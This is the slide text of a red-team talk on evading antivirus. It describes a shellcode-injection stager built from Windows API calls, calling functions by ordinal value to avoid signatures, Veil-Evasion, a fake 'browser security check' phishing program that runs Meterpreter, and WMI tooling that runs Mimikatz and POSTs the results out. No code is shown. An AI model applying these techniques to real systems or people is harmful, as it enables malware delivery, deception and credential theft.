Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

A Battle Against the Industry - Beating Antivirus for Meterpreter and More


Published on

This talk goes over how stagers work in a different manner. Rather than standard function calls, I show how to utilize the same functionality in a slightly different way. It talks about Veil-Evasion, and a signature that was developed for it. Finally, I get into custom code and showcase three pieces of custom code that completely bypass antivirus.

Published in: Internet
  • Be the first to comment

A Battle Against the Industry - Beating Antivirus for Meterpreter and More

  1. 1. A Battle Against the Industry - Beating Antivirus for Meterpreter and More @ChrisTruncer
  2. 2. Whoami ■ A systems administrator turnedredteamer ■ Florida State Seminole ■ Open Source Software Developer ■ Veil-Framework ■ EyeWitness Thanks Robin :) ■ Egress-Assess ■ Just-Metadata
  3. 3. Why am I here today? ■Share some laughs at Antivirus :) ■Give a background on stagers ■Showcase a Veil-Evasion signature bypass ■Anyone can do this.. ■Talk about developing your own code ■Case studies on previously developed code
  4. 4. Stagers
  5. 5. What are stagers? ■Can be referred to as “stage 1” ■Might be msfvenom, Veil-Evasion, etc. output ■Goal is typically to inject shellcode into memory ■Shellcode usually downloads and executes a reflectively injectable dll ■…but it can also do anything you want if you write it :)
  6. 6. What are stagers? ■Stagers are really used as loaders for your real malware ■They’re designed to be expendable and tiny ■Don’t give away your engineered malware by dropping it to disk ■Load everything in memory
  7. 7. What are stagers? ■Any language that has the ability to access windows functions can be used to write a stager! ■Pretty cool, and allows us to expand out from traditional “Windows Langauges” ■Interacting with Windows functions can seem daunting, but isn’t all that bad ■4 or 5 function calls
  8. 8. Function Calls
  9. 9. Stagers in a Nutshell ■ Allocate memory to store the shellcode being injected, and apply proper memory permissions ■ Copy the shellcode into the allocated memory ■ Create a thread to run the shellcode copied into the process’s memory ■ Wait for the thread to complete running before exiting the program
  10. 10. Windows API Calls ■Most stagers utilize VirtualAlloc to allocate memory ■This talk shows an alternate way to allocate memory that isn’t heavily utilized ■It might be a better way to fly under the radar
  11. 11. HeapCreate ■Creates a private heap object that can be used by the process creating the heap ■Specify the memory protections ■Requires the size of the heap that will need to be allocated ■Shellcode length ■Max size of allocated memory ■I do twice the shellcode length
  12. 12. HeapAlloc ■ Allocates memory from the previously created heap object ■ Receives a handle to the previously allocated heap object ■ Specify the total amount of space that you are allocating for shellcode
  13. 13. RtlMoveMemory ■Places the shellcode you are injecting into the allocated heap space ■Needs a pointer to where data (shellcode) will be copied to (heapalloc output) ■Needs a pointer to the data (shellcode) ■Needs the length of the shellcode being injected
  14. 14. CreateThread ■This function creates a new thread within the current process to execute the data (shellcode) that was injected ■Requires a pointer to the data (shellcode) that will run in the new thread ■Schedule the thread to execute immediately
  15. 15. WaitForSingleObject ■This function is like a blocking call to prevent the program from exiting immediately ■Requires a handle to the thread that was created by the CreateThread function ■Requires a value (-1) to specify that the program should wait to exit until the thread exists
  16. 16. Stagers in a Nutshell (Repeated) ■ Allocate memory to store the shellcode being injected, and apply proper memory permissions ■ Copy the shellcode into the allocated memory ■ Create a thread to run the shellcode copied into the process’s memory ■ Wait for the thread to complete running before exiting the program
  17. 17. Ordinal Values
  18. 18. Ordinal Values ■ Using ordinal values to reference functions is an old-school but effective way to bypass antivirus detection ■Picture an array or Python list containing functions. To reference a specific function, you reference it by its location within the array/list ■Same concept for bypassing AV via ordinal values
  19. 19. Ordinal Values ■ Rather than calling HeapAlloc or RtlMoveMemory by name, why not reference it by its ordinal value? ■ This is still a call to the same function, but just via a different method ■Check out this code
  20. 20. Ordinal Values ■Simply referencing function calls by their ordinal value vs. name can bypass anti-virus ■NOTE: Ordinal values can change between both OSs and Service Packs. You will need to target your payload to the OS and Service Pack when referencing via ordinal value. ■So…. how do we find these ordinal values?
  21. 21. Ordinal Values ■PEView is a free program which lets you inspect PE files, dlls, etc. ■You can use this to load kernel32.dll, search for the functions that you are calling, and obtain their ordinal value ■PEView provides the base 16 value, so be sure to convert it to its base 10 value.
  22. 22. Veil’s Approach
  23. 23. How Veil-Evasion Bypasses AV ■ Completely open sourced ■ Can query VT’s API ■ Veil-Evasion attempts to bypass AV through a few different techniques ■Obfuscated Code ■Encrypted Code ■Non-standard languages for binaries Flat vs. encrypted code
  24. 24. How Veil-Evasion Bypasses AV ■ Languages that Veil-Evasion supports ■Python ■Perl ■PowerShell ■C# ■C ■Go ■Ruby
  25. 25. How Veil-Evasion Bypasses AV ■Using a non-standard language (read not C, C++, or C#) resulted in payloads that immediately bypassed antivirus ■AV just didn’t understand how to properly inspect these executables ■Example: ■C Flat vs. Python Flat
  26. 26. Ordinal Values ■ Simply changing the language the payload was written in completely bypassed all AV signatures.
  27. 27. Antivirus Signature
  28. 28. Veil-Evasion ■After about 1 year, Veil-Evasion finally had its first signature! ■I was informed about this on IRC and wanted to check it out.
  29. 29. Custom Code
  30. 30. Browser Check Scenario ■Instead of sending just some random executable when phishing, what if you promise to secure their system? ■Developed by Hunter Hardman (@t3ntman) ■Written in C# ■Custom code, so it bypasses every single AV out there (at least before Hunter made it public :))
  31. 31. Browser Check Scenario ■This works great for phishing scenarios ■We target individuals impersonating their IT Security, or just IT staff ■Warn them about the dangers of misconfigured/old browsers ■Give them a solution!
  32. 32. Browser Check Scenario ■Once the program starts, it spawns PowerShell and executes any code you give it ■Meterpreter or Beacon! ■It’s fully functional, once user tells it to start, they see a progress bar go to completion. ■Once complete, it lets them know their system is secure!
  33. 33. Browser Check Scenario ■Delivery is dependent upon the situation ■We’ve created websites hosting it over HTTPS to make users think it is secure ■Created fake “secure file transfer” websites ■Rarely, we’ve sent just the executable ■For our initial access, this has been pretty successful, and the lack of AV detection helps the user trust the program
  34. 34. Browser Check Scenario ■Currently available for review at -
  35. 35. Enumerator
  36. 36. Enumerator ■Customer didn’t want actual shellcode injection of infection of their endpoints ■Wanted intel collection to act as proof of “compromise” ■I developed a script that would gather host information and would POST the data out over HTTPS to our server.
  37. 37. Enumerator ■Information gathered ■System hostname ■IP address(es) ■System drives and drive space ■Current user ■Tasklist
  38. 38. Github ■ s/blob/master/ ■ s/blob/master/
  39. 39. WMIOps
  40. 40. WMIOps ■Why waste engineering time, developing a RAT, hoping it never gets burnt. Just leverage built in functionality! ■Anything useful for system administration is just as easily repurposed for illegitimate use :) ■Just live off the land!
  41. 41. WMIOps ■Used WMI much? ■WMI is installed and running by default on Windows systems since Windows 2000 ■It does require local admin privileges on the targeted system But this can make it great for post- exploitation
  42. 42. WMIOps ■ WMIOps - A PowerShell based tool which uses WMI to carry out various actions on targeted systems. ■ Developed in PowerShell - we can load it in memory and execute a variety of different tasks
  43. 43. WMIOps ■ Want to see which users have active processes on a system? ■Might be good to know where you can snag creds! ■Rather than needing to compromise the machine, just run a simple WMI query with WMIOps!
  44. 44. WMIOps ■Now that we know who is on the system, want to run Mimikatz to capture user credentials? ■Traditionally we’d have to compromise it, and load up Mimikatz. ■Why not leverage WMI to do everything in memory without needing the use of a RAT?
  45. 45. WMIOps ■ Invoke-RemoteScriptWithOutput ■Spawn PowerShell on the remote system ■Download the PowerShell script in memory ■Runs the user specified function ■Saves output ■Performs a POST over HTTPS to a user specified IP address
  46. 46. WMIOps ■ WMIOps can do other tasks as well ■Run commands ■Kill processes ■Search for files ■Transfer files ■Etc. Available here -
  47. 47. Thanks! Any questions? Reach out to me! ■ @ChrisTruncer ■ ■ ■